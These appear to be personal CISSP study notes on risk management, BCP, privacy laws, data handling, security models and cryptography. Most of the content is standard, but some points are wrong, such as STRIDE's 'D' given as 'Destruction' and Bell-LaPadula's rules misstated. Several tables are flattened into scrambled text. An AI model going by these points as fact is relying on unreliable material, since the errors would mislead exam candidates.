1

Domain 1
 steps of developing a disaster recovery and continuity plan (PI, ST, BIA, Dev, I, T, M)
• Project initiation,
• Strategy development,
• Business impact analysis,
• Plan development
• Implementation,
• Testing,
• Maintenance

 The project scope and planning phase includes four actions (Ana, Team, Assessment, Analysis)

• A structured analysis of the organization,

• Creation of a BCP team, an
• Assessment of available resources, and an
• Analysis of the legal and regulatory landscape

 BCP Development Process (Policy, BIA, Control, Recovery, Contingency, T&T, Maintenance)
• Develop A BCP Policy Statement
• Conduct a BIA - A business impact analysis includes identifying critical systems and
functions of a company and interviewing representatives from each department.
Once management’s support is solidified, a business impact analysis needs to be
performed to identify the threats the company faces and the potential costs of
these threats.
• Identify preventive controls
• Develop recovery strategies
• Develop an IT contingency Plan
• Perform DRP training and testing
• Perform BCP/DRP maintenance

 When developing a security program, the follow steps should take place in this order;

1. Identify a team of internal employees and/or external consultants who will build the
physical security program through the following steps.
2. Carry out a risk analysis to identify the vulnerabilities and threats and to calculate the
business impact of each threat.
3. Work with management to define an acceptable risk level for the physical security
program.
4. Derive the required performance baselines from the acceptable risk level.
5. Create countermeasure performance metrics.

 Elements of RISK
o Threats exploits Vulnerability results Exposure -> Risk -> Mitigated by Safeguard ->
which protects Asset

 The first step in a business impact analysis (BIA) is creating data-gathering techniques.

 The COSO framework is made up of the following components: • Control environment •

Management’s philosophy and operating style • Company culture as it pertains to ethics and
fraud • Risk assessment • Establishment of risk objectives • Ability to manage internal and
external change • Control activities • Policies, procedures, and practices put in place to
mitigate risk • Information and communication • Structure that ensures that the right people
get the right information at the right time • Monitoring • Detecting and responding to control
deficiencies
 2

 COBIT is broken down into four domains: Plan and Organize, Acquire and Implement, Deliver
and Support, and Monitor and Evaluate. (PO, AI, DS, ME)
 COBIT defines IT goals where ITIL provides the process-level steps on how to achieve them
 The correct definition mappings are below:
i. Civil (Code) Law Civil law is rule-based law not precedence based
ii. Common Law Based on previous interpretations of laws
iii. Customary Law Deals mainly with personal conduct and patterns of behaviour
iv. Religious Law Systems Based on religious beliefs of the region

The United States Code (USC) contains the text of all federal criminal and civil laws passed by the
legislative branch and signed by the president (or where the president’s veto was overruled by
Congress).

 Data Classification
Government VS Private (TSCU – CPSP)
• Top Secret Confidential
• Secret Private
• Confidential Sensitive
• Unclassified Public

 SLE = AV*EF
 ARO = Annual rate of occurrence
 ALE = SLE * ARO
 ACS (Annual cost safeguard) = ALE before safeguards - ALE after safeguard - cost of the safe
guard

Security Activity – IDIOD – Intiaition- Development/Acquisition– Implementation/Assessment–

Operation – Assessment

RISK Frameworks

 It is guideline for how risk to be assessed resolved and monitored

 RISK Framework: RMF, OCTAVE, FAIR & TARA
 Six Steps of RMF (Categorize, SIA (Control), Authorize, Monitor)
o Categorize Information System
o Select Security Controls
o Implement Security Controls
o Assess Security Controls
o Authorize Information System
o Monitor Security Controls

FAIR is a risk framework that develops baselines of probabilities for the frequency and magnitude of
loss events.

Threat Modelling

 Secure by Design, Secure by Default, Secure in Deployment and Communication (SD3+C)

 Thread Modelling Phases (IDRP)
o Identifying Threats
o Determining and Diagraming Potential Attacks
o Performing Reduction Analysis
o Prioritization and Response
 Threat Identifying Approach – Focused on Assets, Focused on Attackers & Focused on Software
 DREAD – Rating Matrix for Threat – Damage-Reproduce-Exploit-Affected Users-Discoverability
 Threat Model – STRIDE(Microsoft), PASTA, Trike, VAST, DREAD(Quantity based)
 3

 STRIDE is an aggregated threat-modelling technique

o Spoofing-Tempering-Repudiation-Information Disclosure-Destruction-Elevation of
Priveleges
 PASTA Steps: Process of Attack Simulation & Threat Analysis
o Define Business Objectives
o Define Tech Scope
o App Decomposition
o Threat Analysis
o Vuln Detection
o Attack Enumertaion
o Risk/Impact Analysis

 The OCTAVE framework is comprised of three phases, which include (1) identifying assets and
threats, (2) identifying vulnerabilities and potential safeguards, and (3) conducting a risk
analysis
 The guide describes a nine-step risk analysis process: 1. System Characterization 2. Threat
Identification 3. Vulnerability Identification 4. Control Analysis 5. Likelihood Determination 6.
Impact Analysis 7. Risk Determination 8. Control Recommendations 9. Results Documentation6
 FRAP is designed to be performed by a team of business managers and technical staff from
within the organization. The team’s goal is to brainstorm and identify risk. As the FRAP team
identifies risk, they apply a group of 26 common controls designed to categorize each type of
risk. Delphi requires answers to be submitted in written form

EU-US Privacy Shield Framework To enable companies in the US tp process personal information
of individuals in EU member nations
ITAR Defence Goods, Arms Export Control
FERPA Education
GLBA Financial Institutions
US Privacy Act Privacy Act of Individual citizens
OECD Data Collection, specification & Safeguards
ECPA Electronics Privacy of Individual
USA PARTIOT Terrorism
COPPA Children
CALEA Communication - Wiretap
CFAA it a federal crime to maliciously cause damage in excess of
$5,000 to a federal computer system during any one-year period
Safe Harbour & Privacy Shield European Union Privacy Law
SOX A US law that requires internal controls assessments including IT
transaction flows for publicly traded companies
GDPR The General Data Protection Regulation is a regulation in EU law
on data protection and privacy for all individual citizens of the
European Union and the European Economic Area.
PCI DSS Payment Card Industry Data Security Standard
FISMA Applicable to Government Contract – (Old GISRA)
SCA US government process for assessing security controls and is
often paired with a Security Test and Evaluation (ST&E) process
HIPPA & HITECH Health & BAA - PHI
US No national Privacy Compliance – HIPPA & GLBA
PIPEDA Personal Information & Protection of Electronics & Document Act
- Canada
Economic Espionage Act imposes fines and jail sentences on anyone found guilty of
stealing trade secrets from a US corporation
USPTO registration of trademarks.
Code of Federal Regulations administrative laws promulgated by federal agencies.
 4

(CFR) contains

ISO: (ISMS Req., Practice of ISM, Guidelines, Metrics, Risk, Audit) (RPGMRA)

o ISO/IEC 27001 ISMS requirements

o ISO/IEC 27002 Code of practice for information security management
o ISO/IEC 27003 Guideline for ISMS implementation
o ISO/IEC 27004 Guideline for information security management measurement and metrics
framework
o ISO/IEC 27005 Guideline for information security risk management
o ISO/IEC 27006 Guidance for bodies providing audit and certification of information security
management systems

In 1992, the Committee of Sponsoring Organizations of the Treadway Commission (COSO) developed
a model for evaluating internal controls. This model has been adopted as the generally accepted
framework for internal control and is widely recognized as the definitive standard against which
organizations measure the effectiveness of their systems of internal control.

What Is The COSO Framework? (CEnv, Risk, CAct, Information & Communications, Monitoring)
(CRCICM)

The COSO model defines internal control as “a process, effected by an entity’s board of directors,
management and other personnel, designed to provide reasonable assurance of the achievement of
objectives in the following categories:

 Effectiveness and efficiency of operations

 Reliability of financial reporting
 Compliance with applicable laws and regulations”

In an “effective” internal control system, the following five components work to support the
achievement of an entity’s mission, strategies and related business objectives.

1. Control Environment
Integrity and Ethical Values
Commitment to Competence
Board of Directors and Audit Committee
Management’s Philosophy and Operating Style
Organizational Structure
Assignment of Authority and Responsibility
Human Resource Policies and Procedures
2. Risk Assessment
Company-wide Objectives
Process-level Objectives
Risk Identification and Analysis
Managing Change
3. Control Activities
Policies and Procedures
Security (Application and Network)
Application Change Management
Business Continuity/Backups
Outsourcing
4. Information and Communication
Quality of Information
Effectiveness of Communication
5. Monitoring
Ongoing Monitoring
 5

Separate Evaluations
Reporting Deficiencies

These components work to establish the foundation for sound internal control within the company
through directed leadership, shared values and a culture that emphasizes accountability for
control. The various risks facing the company are identified and assessed routinely at all levels and
within all functions in the organization. Control activities and other mechanisms are proactively
designed to address and mitigate the significant risks. Information critical to identifying risks and
meeting business objectives is communicated through established channels up, down and across the
company. The entire system of internal control is monitored continuously and problems are
addressed timely.

Table 1.1 Common Types of Financial Damages

Statutory Statutory damages are those prescribed by law, which can be

awarded to the victim even if the victim incurred no actual loss or injury

Compensatory The purpose of compensatory damages is to provide the victim

with a financial award in effort to compensate for the loss or injury incurred as
a direct result of the wrongdoing

Punitive The intent of punitive damages is to punish an individual or

organization. These damages are typically awarded to attempt to discourage a
particularly egregious violation where the compensatory or statutory damages alone
would not act as a deterrent

ISC2 Ethics

 “protect society, the commonwealth, and the infrastructure.” 1 The focus of the first canon is
on the public and their understanding and faith in information systems. Security professionals
are charged with the promotion of safe security practices and the improvement of the security
of systems and infrastructure for the public good.

 “act honorably, honestly, justly, responsibly, and legally.” 1 This canon is fairly
straightforward, but there are a few points worth emphasizing here. One point that is detailed
within this canon is related to laws from different jurisdictions found to be in conflict. The
(ISC) 2 ® Code of Ethics suggests that priority be given to the jurisdiction in which services are
being provided. Another point made by this canon is in regard to providing prudent advice and
cautioning the security professional against unnecessarily promoting fear, uncertainty, and
doubt.

 “provide diligent and competent service to principals.” 1 The primary focus of this canon is
ensuring that the security professional provides competent service for which he or she is
qualified and which maintains the value and confidentiality of information and the associated
systems. An additional important consideration is to ensure that the professional does not have
a conflict of interest in providing quality services.

 “advance and protect the profession.” 1 This canon requires that the security professionals
maintain their skills and advance the skills and knowledge of others. Additionally, this canon
requires that individuals protect the integrity of the security profession by avoiding any
association with those who might harm the profession.

RFC
1087 Ethics & Internet
1918 IP Address Range
2196 Site Security Handbook
2660 S-HTTP – Only Symmetric Key
2818 HTTPS – Asymmetric & Symmetric Keys
 6

 Data hiding is the process of revealing only external properties to other components. Data
hiding can be accomplished through a layering or encapsulation process or by preventing an
application from accessing hardware directly. Encryption is the process of turning data into an
unintelligible form. Abstraction is used to remove complexity. Obfuscation is making something
unclear or unnecessarily complicated.
 A security program has a full life cycle that permits continuous improvement. Starting with
organizing, it then implements, operates, monitors, and evaluates performance to feed back
into any necessary organization restructuring. This starts the process over again.
 Need to know is part of confidentiality requirement not integrity
 Invocation Property is part of Biba Model and enforces integrity principles
 System operated in Dedicated Security Mode handle single classification levels of information
 In cooperative mode Application manages system resources
 Multitasking is property of Operating system not Processor
 Sleep State of CPU means it is waiting for user input or time allotment from the CPU
 MC-E5 (Mobile Commerce Extension Specification) would improve overall security on
wireless devices
 Military will always build their Network Infra on Confedtality always consider Bell-Lapadula
 Ensuring that process does what it is intended to do every time is called the Internal
Consistency
 TCSEC’s RED Book focuses on Network & Telecom Product

Concealment – Act of hiding or preventing disclosure (Security through Obscurity)

Seclusion – Storing something in an out of way location
Isolation – Act of keeping something separated from others

 SABSA – Access Control matrix based framework – Six Different perspectives Contextual,
Conceptual, Logical, Physical, Component and Operational

 Zachman Framework is an enterprise architecture framework, and SABSA is a security

enterprise architecture framework. The Zachman Framework is not security oriented, but it is a
good template to work with to build an enterprise security architecture because it gives
direction on how to understand the enterprise in a modular fashion

 In short, Cybersquatters register domain names containing trademarked terms, with a view to
making an illegal profit from them or to misuse it, whereas Typosquatters register domain
names using misspelled words or large popular websites, with malicious intent.

TVERSA – Threat- Vulnerability-Exposure-Risk-Safeguard-Asset

 7

 Overall Goal of IT Governance should be aligned with Corporate Governance

 Risk Management is important aspect of Security Governance and must be aligned with Business
Objectives
 Security Governance = Information Security Governance
 CISO Responsible for ensuring protection of all the business information assets
 Policy need to be reviewed Annually, Business Change, Env Change & Business Change
 Threat Modelling – Identifying of probability of Threats in Design Phase (Qualittaive Approach of
Risk Analysis)
 Threat Analysis – Identifying of preventive threats in Organization
 Risk Appetite Vs Risk Tolerance – According to the IIA, both risk appetite and risk tolerance set
boundaries of how much risk an entity is prepared to accept, but there is an important
difference between risk appetite vs risk tolerance.
o A risk appetite statement is a higher level statement that broadly considers the levels
of risk management deems acceptable, while risk tolerances are narrower and set the
acceptable level of variation around objectives.
 Risk Avoidance = Risk Rejection
 Senior Management Owns Risk
 Auditing is Process while Assessment is Technical
 Group of Test = Assessment = Audit
 Baiting – Keep free USB, CD, DVD and hack information
 Tailgating – Known, Piggybacking – Unknown
 Awareness – Behaviour – Short Term, Information
 Training – Profile – Intermediate – Knowledge
 Education – Career – Long Term – Insight
 BCP – Corrective, DR – Recovery Control
 Risk Assessment is part of Business Assessment
 Criticality = Availability
 Sensitivity = Confidentiality & Integrity
 Validation of BCP can be ensured by restoring everything within defined MTD
 Vision, Mission, Strategy ( 3-5 years) , Tactical ( 1-3 years) and Operations ( 0-6 months)
 Top down approach Due diligence and Bottom up approach - Due care
 Risk Management is part of strategy plan, Risk assessment and analysis is part of Tactical plan (
operational Plan VAPT)
 There is an organisation called WIPO ( www.wipo.int ) World Intellectual Property Organization
- local regulations for every country. for ex: register under the regulation .
 Type of Intellectual property laws - Four types
o Trade Secret - protection duration not in the CISSP exam.
o Copyright - Protection period of copyright is 70 years. duration of protection copyright
is stronger than patent. management asset / Intellectual property is weaker
o Trademark
o Patent - Protection period of patent is only 20 years, management of assets / IP is
stronger
 Trans-Border Data Flow
o Security professionals should be aware of three regulations:
 8

o • International Traffic in Arms Regulations (ITAR), which defined defense articles and
defense services with stipulations for their import and export.
o • Export Administration Regulations (EAR), which allowed the President to regulate
export of civilian goods and services
o • The Wassenaar Arrangement, which was established to promote greater transparency
in the transfer of weapons, technologies, and other goods
 Policy is the best tool by which we can comply with external regulations, directive control to
control the behaviour of the people - Exam question
 Policy is the Intent of the management, Its part of strategy - Change management policy ,
Three are three types of policies , policy set the direction, draft by Information security
managers and involve all the department heads approved by Senior management .
o Corporate policy - across organization AUP ( Acceptable Use Policy )
o System specific policy - introduce password policy ( functional policy) , Data
classification
o Issue specific policy - in order to meet specific regulation ( for reference)
 Policy has four components (Strategic)
o Standards ( what) - what is required -------Tactical
o Procedure ( How) - Detailed procedures how -----------------Operational
o Baselines (What) - minimum requirements ( shouldn’t go less than that) , directive in
nature its optional but when you implement technical solution, its mandatory, ex: CIS
benchmarks. Minimum acceptable technical configuration elements in a system. ---------
-----Operational
o Guidelines ( How) - not mandatory ---------------------Tactical
 Risk: The Probability (likelihood) that a given threat (any action) source will exercise a
particular vulnerability and the resulting impact should that occur.
 Information security risk management of managing the risks that's acceptable to a level
accepted by the organization.
 Two types
o ERM - Enterprise Risk Management ( People, Process and Technologies)
o IRM - Information Risk Management i.e CIA
o CISSP we cover IRM - in some cases we apply ERM.
 First Asset valuation - Inventory of assets - critical components of risk identification - exam
question. Identify the value of assets by contacting business owners/senior management. 100%
security is not possible in all assets.
 Placement of Firewall is Physical , configuration is Technical
 Risk Analysis involves four steps
o - Identify the assets to be protected including sensitivity
o - Define Specific Threats
o - Calculate Annualized Loss Expectancy ( ALE) in case of Quantitative
o - Select appropriate safeguards.
 RMF - Continuous monitoring of risk controls is important. Remember the sequence for the
exam - Categorize, Select , Implement, Assess, Authorize and Monitor. Drag & Drop might come
in the exam.

Penetration testing strategies

 External Testing - attacks to organization network perimeter , target DNS, Email, Web and FW
 Internal Testing - performed within the organization internal network.
 Two types of team in organization Red Team (Offensive - perform testing ) and Blue Team (
Defensive)
 Blind Testing - didn’t provide any information, they need to gather all the information and
perform this attack, company will observe the skills, how effective they are, how the
organization is ready. Blue team is aware about PT
 9

 Double-Blind Testing - in Double blind, Blue team is not aware about any PT, how effective the
controls and incidents are is measured in Double blind testing.
 Penetration Test Methodologies : this is step by step process for either Black box, Gray box and
White box.
o Reconnaissance search for any information & gather required information
o Enumeration - another name is scanning ( Port scan/ network scan)
o Vulnerability analysis - analyzing the vulnerabilities of the system
o Execution/ Exploitation - once vulnerability identified, exploit
 Pivoting Method: Penetration of one network to other network is called pivoting.
 Traffic Padding: is not a technique used to perform penetration test.
 Sample Reports -
o - Risk report ( risk assessment and control recommendation report, control approval
report, risk registry)
o - Control Assessment Report
o - Risk Monitoring Report
 BCP is strategic Plan & DRP is Tactical/operational Plan for only IT
 BCP as per the CBK, DR is subset of BCP, As per ISC, there are four steps.
o 1. Project Scope
o 2. BIA
o 3. Continuity Planning ( Recovery Strategy)
o 4. Approval implementation
 BIA - Gather information -> Analyze -> Perform Threat analysis -> document results and present
recommendations.
 Primary objective of Mandatory vacation is to detect a fraud not to prevent a fraud - Exam
question
 Primary objective of Introducing the job rotations is to prevent the fraud, but if we get options
to prevent fraud - answer is job rotation. Exam question.
 PASTA – Define Biz Objectives – Define Tech Scope – App Decomposition – Threat Analysis –
Vulnerability Detection – Attack Enumeration – Risk/Impact Analysis
 Pretexting attacks - The act of creating and using an invented scenario ( the pre text) to
engage a targeted victim in a manner that increases the chance the victim will divulge
information or perform actions that would be unlikely in ordinary circumstances
 Shoulder surfacing , tailgating, and Phishing should be addressed through Security awareness
training. - exam question.
 Most important element to include in SLA is right to audit - Exam Question customer can ask
audit report SOC, ISO Reports..etc
 SLAs define the agreed upon the level of performance and compensation or penalty between
the provider and the customer, assurance can only gained through inspection, review and
assessment, SLA are defined from SLR ( Service Level Requirements) - required shared by the
customer to vendor, SLA signed between customer and vendor. Service Level Requirements SLR
is a draft of SLA, single SLA can contain multiple services,
 Formal Security awareness Training: A Method by which organizations can inform employees
about their roles and expectations surrounding their roles in the observance of information
security requirements. - Directly in the Exam
 Opt-Out Agreement – Information Sharing Agreement that requires a user to prevent an entity
from sharing that user’s information
 Opt-In Agreement – For Organization to take user’s permission before sharing user’s detail
 Security Training and Awareness
o Training must be driven by senior management
o Training method is not as important as the content
o Awareness: Provides general security information on current security risks
o Training: Provides the knowledge on how to respond or handle security threats
o Education: A continuous process to provide understanding of security risks
o Focus training on specific roles
 10

o Make sure employees acknowledge training attendance

o Keep records private and retain per legal and/or organizational
 The Federal Privacy Act of 1974 was created to protect the U.S. citizens from government
agencies using information that they collected improperly

 The FBI and Secret Service are both responsible for investigating computer crimes.

 The Software Protection Association (SPA) and Business Software Alliance (BSA) were formed to
protect software vendors and their licenses against piracy.

 The ISCP differs from a DRP primarily in that the information system contingency plan
procedures are developed for recovery of the system regardless of site or location
 Most laws are drawn from ethics and are put in place to ensure that others act in an ethical
way.

security steering committee, which is responsible for making decisions on tactical and strategic
security issues within the enterprise

The Council of Europe (CoE) Convention on Cybercrime is one example of an attempt to create a
standard international response to cybercrime

Failure Modes and Effect Analysis (FMEA) is a method for determining functions, identifying
functional failures, and assessing the causes of failure and their failure effects through a structured
process.

A fault tree analysis is a useful approach to detect failures that can take place within complex
environments and systems.

NDA contains Non-Disclosure Demand not NCA

FRAP is designed to be performed by a team of business managers and technical staff from within
the organization. The team’s goal is to brainstorm and identify risk. As the FRAP team identifies
risk, they apply a group of 26 common controls designed to categorize each type of risk. Delphi
requires answers to be submitted in written form

According to Deloitte, there are three methods for calculating the value of intangible assets:

Market approach: This approach assumes that the fair value of an asset reflects the price at
which comparable assets have been purchased in transactions under similar circumstances.

Income approach: This approach is based on the premise that the value of an … asset is the
present value of the future earning capacity that anasset will generate over its remaining
useful life.

Cost approach: This approach estimates the fair value of the asset by reference to the costs
that would be incurred in order to recreate or replace the asset. 5

The guide describes a nine-step risk analysis process: 1. System Characterization 2. Threat
Identification 3. Vulnerability Identification 4. Control Analysis 5. Likelihood Determination 6.
Impact Analysis 7. Risk Determination 8. Control Recommendations 9. Results Documentation6
 11

Domain 2
 Methods of removing data

a. Erasing: Simple deletion of file. Data can be overwritten and removed

b. Clearing (overwriting): Unclassified data is overwritten. Overwritten data can be re retrieved
in labs using some tools.
c. Purging: Intense form of clearing. Prepares a media to be reused in less sensitive
environment. Data non-recoverable using known methods. High classified data is not purged
(e.g. Top Secret)
d. Declassification: Process of using a media in an unclassified environment.
e. Sanitization: Combination of processes to remove data ensuring data cannot be recovered at
any cost. (Destruction of media without physically destroying it) - USB Device does not support
sanitize commands
f. Destruction: Final stage in the lifecycle of media. Most secure method of sanitization.
Methods include incineration, crushing, shredding, disintegration and dissolving using
chemicals.

 Double encoding is the attack technique that is most likely used to be used in an attempt to
bypass web application’s existing directory traversal security check

By default, BitLocker and Microsoft’s Encrypting File System (EFS) both use AES (Advanced
Encryption Standard)

Bcrypt is based on Blowfish (the b is a key hint here).

The Electronic Discovery Reference Model (EDRM) defines which of the following series of steps for
e-discovery? - Identification, Preservation, Collection, Processing, Review, Analysis, Production,
and Presentation (IPCPRAPP)

Steps of Data Classification Programs - Define the classification levels, specify the classification
criteria, and identify the data owners who will be responsible for determining classification of the
data(CL,CC,DO)

Identity theft is categorized in two ways: true name and account takeover. True name identity
theft means the thief uses personal information to open new accounts

Scoping Vs Tailoring

 Scoping – Reviewing a list of baseline security controls and selecting only those controls that
apply to the IT system you are trying to protect
 Tailoring – Modifying the list of security controls within a baseline so that they align with the
mission of organization

Pseudonymization:

 Alias
 Same as Tokenization
 GDPR refers to pseudomization as replacing data with artificial identifiers

Anonymization: (Can’t be reversed)

 Process of removing all relevant data so that it is impossible to identify the original
subject/person
 Data Masking can be and effective method of anonym zing data
 12

 Categorization is part of Classification (Categorization deals with Impact and Classification

deals with Access)
 Data Steward - A data steward is a role within an organization responsible for utilizing an
organization's data governance processes to ensure fitness of data elements - both the content
and metadata.
 QC – Internal & QA External
 Crypto-shredding is the practice of 'deleting' data by deliberately deleting or overwriting
the encryption keys.[1] This requires that the data have been encrypted. Data comes in these
three states: data at rest, data in transit and data in use. In the CIA triad of confidentiality,
integrity, and availability all three states must be adequately protected. The only solution for
the Cloud is Encryption, before sending encrypt the data and then store data in the Cloud.
Encrypting data before it is stored on the media can mitigate concerns about data remanence;
this process is called a crypto-erase/crypto-shredding.
 FIPS 140-2 – Federal Information Processing Standard
 Label – Visibility – External
 Markings – Authenticity – Company Letter Head
 SED – Self Encryption Device
 DRM is compensating control of DLP
 Sensitivity - Classify the data / deals with access / confidentiality
 Criticality - categorize the data/deals with impact
 The individual, who owns the data should decide on the data classification i.e Data Owner,
should review the data classification annually.
 DATA Privacy Regulations:
o APEC – Asia Pacific Economic Cooperation Privacy Framework (Enhance the function of
free markets through adherence to PII)
o PIPEDA – Canada – Personal Information Protection and Electronics Document
 GDPR – Privacy Principles – LPDASI – Sequence is important
o Lawfulness, fairness and transparency
o Purpose Limitations
o Data Minimization
o Accuracy
o Storage Limitations
o Integrity & Confidentiality
 Data owner - Values the asset
 Data Custodian - maintains the custody of the data
 Data Steward - Business term - not aligned with Information security, business aspect is steward
 Data Policy: - Some organizations called as Data Protection policy /Data classification policy is
a set of high-level principles that establish a guiding framework for data management, can be
used to address strategic issues, should be flexible , dynamic and achievable
 US ( Data Owner) Europe ( Data Controller)
 US ( Data Custodian) Europe ( Data Processor)
 Data life cycle
o C -> Create ( Owner)
o S -> Store ( Custodian)
o U -> Use ( Custodian)
o S -> Share ( Custodian)
o A -> Archive ( Custodian)
o D -> Destroy ( Owner)
 Adherence ( Due care) Data Custodian
 Ensure ( Due diligence) Data Owner
 Quality Control ( QC) - Introduce several controls and control standards, process the data
according to these controls. Assessment done by internal standards.
 13

 Quality Assurance ( QA) - Internal standard for QC, now we need to set benchmark using
external quality standards. When assessing the quality, there are two things to remember
 During the implementation of data standards consider the below: International law -> National
-> Regional -> local laws
 Covered data means masked data
 Data Remanence: The residual physical representation of data that has been in some way
erased, after storage media is erased, there may be some physical characteristics that allow
data to be reconstructed. The data left is called the residual data. Using countermeasures to
deal with this kind of data - the process is called data remanence. Destroy the residual data.
 Data sovereignty refers to legislation that covers information that is subject to the laws of the
country in which the information is located or stored
 The Destruction using appropriate technique is the most secure method of preventing retrieval
 Degaussing is initially used for media reuse.
 Shredding is the action of tearing or cutting something into shreds.
 PDA uses flash memory, flash memory won’t work with degaussing.
 You can’t grind PDA, but there is shredding available for PDA Devices , HDD Grinding
 If the answer talks between Grinding and shredding the most secure way, go with Grinding.
 SSD – Manufacturers include built-in sanitization commands that are designed to internally
erase the data on the drive. Crypto-erase takes advantage of the SSD’s built-in data encryption
 Best Data Destruction = Crypto-Erase + Sanitization + Overwrite
 Scoping and Tailoring:
o Scoping - Which portion of the standard will be employed
o Tailoring - Customization of the standards to file the organization
 Data at REST – Use AES for encryption
o Data at REST Protection: TPM, IRM & SED
o Removable media should be labelled – Title, Data Owner & Encryption Date
 Data at Transit
o 1. Link Encryption – MPLS/VPN
 Performed by Service Provider. Link encryption encrypts all of the data along
with communications path, done by the Service Provider
 All Data, Headers and addresses encrypted
 Key management and distribution is more complex
 Symmetric key is used
o 2. End to End Encryption – Data/Whatsapp
 Performed by Consumer. Data encrypted from computer to A to computer B
 More easy

 Data Security in Cloud

 DAM/DLP - Digital asset management & Data Leakage Prevention - Effective when Data in Use
 Alternation of Encryption - When data in Use encryption will not work, The alternate solutions
are Masking, Obfuscation, Anonymization, and Tokenization
 Obfuscation - The process of hiding, replacing or omitting sensitive information - hide certain
parts of specific dataset. Another name for Obfuscation is called Masking.(Masking is less Secure
than Encryption)
 14


o Static masking - When data is not in use, Ex: Allowing a customer service
representative limited access to account data. Data at Rest, used in non-production
environment.
o Dynamic masking - Data at Use, Creating a test environment for a new application.
Data in Motion.Used in production environment.

Double encoding is the attack technique that is most likely used to be used in an attempt to bypass
web application’s existing directory traversal security check

Forced Browsing: Attacker is searching for unlinked content on a web server

Symmetric encryption like AES is typically used for data at rest. Asymmetric encryption is often
used during transactions or communications when the ability to have public and private keys is
necessary.

Scoping is the process of determining which portions of a standard will be employed by an

organization.

Tailoring is the process of customizing a standard for an organization.

Electronics Access Control – Overcome the problem of Key Assignment for Physical Security System
 15

Domain 3

SEAL - Encryption Algorithm that uses a 160 bits to ensure the confidentiality of Data

Best to Worst – Counter-OFB-CFB-CBC-ECB

Power Outage

 Fault A momentary loss of power

 Blackout A complete loss of power
 Sag Momentary low voltage
 Brownout Prolonged low voltage
 Spike Momentary high voltage
 Surge Prolonged high voltage
 Noise A steady interfering power disturbance or fluctuation
 Transient A short duration of line noise disturbance
 16

Layers of Ring Model -KODU

1. Ring 0 - Kernel
2. Ring 1 – OS Component
3. Ring 2 – Device Driver
4. Ring 3 - Users

Encrypting the email content can provide confidentiality; digital signatures can provide
nonrepudiation

Buffer Overflow Protection Mechanism

1. Pointer Encoding – Recommends by Microsoft

2. Heap Metadata Protection – In case of pointer is freed incorrectly forces an
application to fail
3. DEP – Prevents executable code from executing within Data Pages
4. ASLR – Places executable into random memory addresses at boot time

BELL-LAPADULA BIBA CLARK WILSON BREWER AND GRAHAM-

LATTICE NASH DENNING MODEL
STATE MACHINE
Confidentiality - Integrity - . Deals with Conflict of Access Control
Deals with Information Integrity. Enforces Interest Matrix - Secure
Confidentiality. Flow Model Segregation of creation and
State Machine & Duties. It has deletion of
Information Flow Constrained objects and
Model Interface. subjects

Bell-Lapadula is
the first model
used by US DOD &
Documented in
Orange book (
TSB is part of
orange book),
Primary focus is
Confidentiality.

It was the first

mathematical
model focus on
multi level
security policy
where different
users has
different level of
access to process
the data.

The User/Subject
must have a
clearance to
process the data.
No Read Up – No Read Down - Information Flow 8 Protection
 17

Simple Property Simple Property Model Rights

No Write Down - * No Write UP - *
Property Property
MAC MAC
No read or write Polyinstantiation
up & down – Invocation is
strong * Unique

 Goguen and Meseguer Model: Deals with Integrity. Non-Interference Model. Predetermined
actions against predetermined objects.
 Sutherland Model: Deals with Integrity. Focus on preventing interference in support of
integrity. Based on State Machine and Information Flow Model. Prevents covert channel.
 Non-interference security architecture to avoid covert-channel attacks

 Question talks about Well formed Transaction - Clark-Wilson

 Question talks about preventing conflict of interest - Brewer-Nash
 Question talks about SDLC security model - Brewer-Nash
 Question talks about confidentiality/subject-to-object/deals with access - Bell-Lapadula
 Question talks about integrity - Biba
 Confidentiality - deals with access - Sensitivity
 Integrity - deals with process - Criticality
 Exam tip: Subjects are assigned according to their trustworthiness; objects are assigned
integrity labels according to the harm that would be done if the data were modified
improper.
 Data Mining – Clark Wilson & Biba
Security Modes: (D, SH, C, M – CAN)

Dedicated – All Clearance, All Approval & All Valid Need to Know

System High – All Clearance, All Approval & Some Valid Need to Know

Compartmented – All Clearance, Some Approval & Some Need to Know

Multilevel – Some Clearance, Some Approval & Some Need to Know

Quantum key distribution is only used to produce and distribute a key, not to transmit any message
data

Cyber Kill Chain framework was developed by Lockheed Martin and is used for identification and
prevention of cyber intrusions. Analysts use the chain to detect and prevent advanced persistent
threats (APT). (7 Stages) - RWDEICA
Reconnaissance - Example: harvest email accounts
Weaponization - Example: couple an exploit with a backdoor
Delivery - Example: deliver bundle via email or Web
Exploitation - Example: exploit a vulnerability to execute code
Installation - Example: Install malware on target
Command and Control - Example: Command channel for remote manipulation
Actions on Objectives - Example: Access for intruder to accomplish goal

 Rooms intended primarily to house computers should generally be kept at 60 to 75 degrees

Fahrenheit (15 to 23 degrees Celsius).
 Humidity in a computer room should be maintained between 40 and 60 percent.
 18

 Too much humidity can cause corrosion, Too little humidity causes static electricity.(High
Humidity may cause condensation to occur which would lead to data loss through a short
circuit)

Point-To-Point Encryption Vs End-To-End Encryption

 P2PE:Prevents merchants from managing key management

 E2EE: Not prevent merchant from managing key management

Symmetric Cryptography

 Transposition Cipher - Rearranging the letters of plain text

 Substitution Cipher - Replace each character or bit with different character. e.g. Vigenere
Cipher (Polyalphabetic Cipher) -
 Running Key Ciphers: AKA Book Ciphers where Encryption key is equal to the length of the
message. (Key is chosen from a common book or newspaper)
 Confusion: Complication in Substitution cipher
 Diffusion: - Transposition -One change in plain text, change the cipher text in multiple
ways.

Modes Type IV Error Propagation

Electronic Code Book (ECB) – Confidentiality Block No No - If the plain text repeats, it
– Very short messages products the same Ciphertext and
good for small data, process is less.
Cipher Block Chaining (CBC)- Authentication Block Yes Yes -
Primary objective is Data authenticity
Cipher Feedback Mode (CFB) - Stream Yes Yes
Authentication
Output Feedback (OFB) Authentication Stream Yes No
Counter Mode (CTR): Confidentiality – Used Stream Yes No - 802.11 i & IPSEC and ATM cell of
in High Speed Applications such as IPSec & WAN technologies
ATM

Core Principles of Public Key Cryptography

Purpose Method
To Encrypt Message Receiver’s Public Key
To Decrypt Message Own Private Key
To Digitally Sign Own Private Key
Verify Signature Sender’s Public Key

Symmetric Vs Asymmetric Vs Hash

Parameter Symmetric Asymmetric Hash
Key Same key is used to One key is used to Message Digest – One
encrypt and decrypt encrypt and another way math
the message key is used to decrypt
n(n-1)/2 = total number 2n = total number of The input can be of
of keys required keys required any length, The output
has a fixed length
Non scalable but great Scalable but very slow
speed
CIA Only P(confidential) PAIN AI
Algorithms DES, 3DES, AES, RC-4, RC- RSA, DSA, ECC, Elgamal, MD2, MD5. SHA-0, SHA-1
